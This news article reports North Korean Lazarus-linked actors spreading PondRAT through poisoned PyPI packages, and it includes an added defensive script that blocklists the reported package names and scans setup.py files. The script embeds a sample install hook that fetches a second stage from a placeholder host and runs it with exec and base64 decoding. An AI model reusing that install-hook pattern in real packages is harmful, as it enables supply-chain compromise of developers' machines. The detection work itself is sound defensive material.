North Korean Hackers Deploy PondRAT via Poisoned Python Packages in Supply Chain Attacks
Researchers from Palo Alto Networks Unit 42 have identified North Korean-affiliated threat actors using compromised Python packages to distribute a new malware strain called PondRAT. This discovery comes as part of an ongoing campaign aimed at developers, further revealing the evolving tactics of North Korea’s Lazarus Group.
PondRAT, believed to be a streamlined version of the macOS backdoor POOLRAT (also known as SIMPLESEA), has surfaced as the latest tool in cyber espionage operations linked to the Lazarus Group. These operations have previously targeted macOS users, with notable incidents such as the 3CX supply chain attack last year.
The campaign is an extension of Operation Dream Job, a long-running effort where attackers pose as recruiters offering enticing job opportunities to lure targets into downloading malware. The attackers exploit Python Package Index (PyPI), a trusted repository for Python developers, by uploading poisoned packages designed to infect development environments.
The Poisoned Python Packages
Unit 42 researchers, led by Yoav Zemah, found that the adversaries uploaded several malicious Python packages to PyPI. These packages, disguised as legitimate open-source projects, are engineered to deliver PondRAT to unsuspecting developers. The packages, now removed from PyPI, include:
- real-ids (893 downloads)
- coloredtxt (381 downloads)
- beautifultext (736 downloads)
- minisound (416 downloads)
Once downloaded, these packages execute a second-stage payload that fetches the malware from a remote server, targeting Linux and macOS systems.
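The infection path described above (a package that looks benign on PyPI but runs a fetch-and-execute stage at install time) is something a defender can screen for before a dependency reaches a developer's machine. The script below is an added example, not Unit 42's or the article's code. It does two things: it checks a requirements-style manifest against a blocklist seeded with the four package names the article reports, and it statically scans a package's `setup.py` for install-time command overrides combined with downloader and code-execution calls. The sample manifest and `setup.py` are constructed for the demo (the URL uses the reserved `.invalid` TLD); the module and call names in the suspicious lists are a heuristic starting point, not a complete signature.

```python
"""Screen Python dependencies for poisoned-package indicators.

Added example (not code from Unit 42 or the article). Two defender-side checks:
 1. check_manifest(): compare a requirements-style manifest against a blocklist
    of package names (seeded with the names the article reports as removed).
 2. scan_setup_py(): static AST scan of a setup.py for install-time hooks that
    fetch and execute a second stage, the behaviour the article describes.
"""
import ast
import re

# Package names reported in the article; extend from your own intel feed.
KNOWN_MALICIOUS = {"real-ids", "coloredtxt", "beautifultext", "minisound"}

# Heuristic indicators: modules and calls rarely needed by a legitimate setup.py.
SUSPICIOUS_MODULES = {"urllib", "urllib.request", "requests", "socket",
                      "subprocess", "base64", "ctypes"}
SUSPICIOUS_CALLS = {"exec", "eval", "system", "Popen", "urlopen",
                    "b64decode", "check_output"}


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-insensitive; '-', '_' and '.' are equivalent."""
    return re.sub(r"[-_.]+", "-", name).lower()


def check_manifest(requirements_text: str) -> list:
    """Return normalised names from a requirements manifest that hit the blocklist."""
    bad = {normalize(n) for n in KNOWN_MALICIOUS}
    hits = []
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("-"):          # skip blanks and pip options
            continue
        # Cut off version specifiers, extras, markers and direct references.
        name = re.split(r"[\s\[<>=!~;@]", line, maxsplit=1)[0]
        if normalize(name) in bad:
            hits.append(normalize(name))
    return hits


def scan_setup_py(source: str) -> list:
    """Return findings describing install-time hooks and downloader behaviour."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            # Subclassing install/develop/egg_info runs code during `pip install`.
            for base in node.bases:
                base_name = ast.unparse(base)
                if base_name.endswith(("install", "develop", "egg_info")):
                    findings.append(f"class {node.name} overrides {base_name}")
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_MODULES:
                    findings.append(f"imports {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "") in SUSPICIOUS_MODULES:
                findings.append(f"imports {node.module}")
        elif isinstance(node, ast.Call):
            func = node.func
            fname = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if fname in SUSPICIOUS_CALLS:
                findings.append(f"calls {fname}() at line {node.lineno}")
    return findings


# Constructed sample of the install-hook pattern the article describes (not a real package).
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import base64, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        code = urllib.request.urlopen("http://example.invalid/stage2").read()
        exec(base64.b64decode(code))

setup(name="coloredtxt", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample manifest mixing benign and blocklisted names.
SAMPLE_REQUIREMENTS = "requests==2.31\ncoloredtxt>=0.1  # text helper\nreal_ids\nnumpy\n"

if __name__ == "__main__":
    print("blocklist hits:", check_manifest(SAMPLE_REQUIREMENTS))
    for finding in scan_setup_py(SAMPLE_SETUP_PY):
        print("setup.py:", finding)
```

Run the `setup.py` scan against the unpacked sdist before installation (for example from a `pip download --no-deps --no-binary :all:` staging directory) rather than after `pip install`, since by then any install hook has already executed. A clean package that only imports `setuptools` and calls `setup()` produces no findings; an install-command override on its own is worth a manual look even without the downloader calls.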
The threat actor behind this campaign has been identified as Gleaming Pisces, also known as Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736—a sub-cluster within the Lazarus Group. They are notorious for distributing the AppleJeus malware, a sophisticated tool used in cryptocurrency theft and espionage operations.
Malware Capabilities and Objectives
PondRAT is described as a lighter version of POOLRAT, designed with enhanced capabilities for both Linux and macOS platforms. It includes functionality to upload and download files, execute arbitrary commands, and pause operations based on preconfigured time intervals. The malware’s core components resemble those of POOLRAT, particularly in how it processes commands from its command-and-control (C2) server.
The Linux and macOS variants of POOLRAT share an almost identical structure in their configuration loading mechanisms, with method names and functionality being strikingly similar across both platforms. This continuity across different operating systems suggests that Gleaming Pisces has been refining its toolkit to enhance its reach and effectiveness.
Supply Chain Compromise and Developer Targeting
The strategic targeting of software developers through poisoned Python packages is part of a broader goal to gain access to supply chain vendors. By compromising developers’ endpoints, the attackers can infiltrate vendor networks and ultimately reach the customers of these vendors—similar to the infamous 3CX incident.
This attack method poses significant risks, as successful installation of malicious packages in development environments can lead to widespread compromise within an organization’s network. Once inside, the malware can provide attackers with remote access, enabling data theft, espionage, and further propagation through the network.
North Korean Threat Actors Targeting Tech Industry
The disclosure of PondRAT’s deployment follows reports from KnowBe4, a cybersecurity company, revealing that North Korean operatives have infiltrated various tech companies by submitting fake resumes and getting hired. This activity cluster, tracked by CrowdStrike as Famous Chollima, highlights North Korea’s growing efforts to exploit the global trend of remote work. The threat actors target organizations by posing as highly skilled developers, gaining employment, and then using their access to conduct espionage.
KnowBe4 warned that more than a dozen companies have been affected by this industrial-scale operation, which is believed to be state-sponsored. It underscores the increasing risk organizations face when hiring remote employees, particularly in industries handling sensitive data or intellectual property.
Source: thehackernews.com